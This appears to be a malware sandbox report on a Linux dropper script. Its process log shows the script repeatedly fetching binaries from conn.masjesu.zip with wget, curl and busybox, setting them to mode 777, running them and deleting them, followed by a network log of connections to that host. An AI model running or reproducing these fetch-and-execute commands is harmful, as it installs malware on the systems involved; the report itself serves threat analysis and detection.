File opened for modification /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD /usr/bin/curl N/A
File opened for modification /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p /usr/bin/curl N/A
File opened for modification /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo /usr/bin/curl N/A
File opened for modification /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a /usr/bin/curl N/A
File opened for modification /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD /usr/bin/curl N/A
File opened for modification /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY /usr/bin/curl N/A
File opened for modification /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR /usr/bin/curl N/A
File opened for modification /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p /usr/bin/curl N/A
File opened for modification /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY /usr/bin/curl N/A
File opened for modification /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I /usr/bin/curl N/A

Processes

/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh

[/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/bin/chmod

[chmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY

[./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/bin/rm

[rm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/bin/chmod

[chmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD

[./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/bin/rm

[rm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/bin/chmod

[chmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa

[./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/bin/rm

[rm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/bin/chmod

[chmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx

[./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/bin/rm

[rm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/bin/chmod

[chmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL

[./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/bin/rm

[rm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

/bin/chmod

[chmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I

[./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

/bin/rm

[rm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/bin/chmod

[chmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo

[./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/bin/rm

[rm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/bin/chmod

[chmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa

[./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/bin/rm

[rm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/bin/chmod

[chmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a

[./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/bin/rm

[rm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/bin/chmod

[chmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp

[./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/bin/rm

[rm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/bin/chmod

[chmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR

[./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/bin/rm

[rm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/bin/chmod

[chmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p

[./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/bin/rm

[rm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/bin/chmod

[chmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA

[./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/bin/rm

[rm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/bin/chmod

[chmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY

[./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/bin/rm

[rm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/bin/chmod

[chmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo

[./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/bin/rm

[rm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/bin/chmod

[chmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa

[./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/bin/rm

[rm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/bin/chmod

[chmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a

[./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/bin/rm

[rm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/bin/chmod

[chmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp

[./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/bin/rm

[rm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/bin/chmod

[chmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR

[./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/bin/rm

[rm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/bin/chmod

[chmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p

[./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/bin/rm

[rm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/bin/chmod

[chmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA

[./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/bin/rm

[rm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/bin/chmod

[chmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY

[./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/bin/rm

[rm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/bin/chmod

[chmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY

[./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/bin/rm

[rm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/bin/chmod

[chmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD

[./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/bin/rm

[rm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/bin/chmod

[chmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa

[./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/bin/rm

[rm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/bin/chmod

[chmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx

[./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/bin/rm

[rm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/bin/chmod

[chmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL

[./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/bin/rm

[rm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

/bin/chmod

[chmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I

[./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

/bin/rm

[rm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
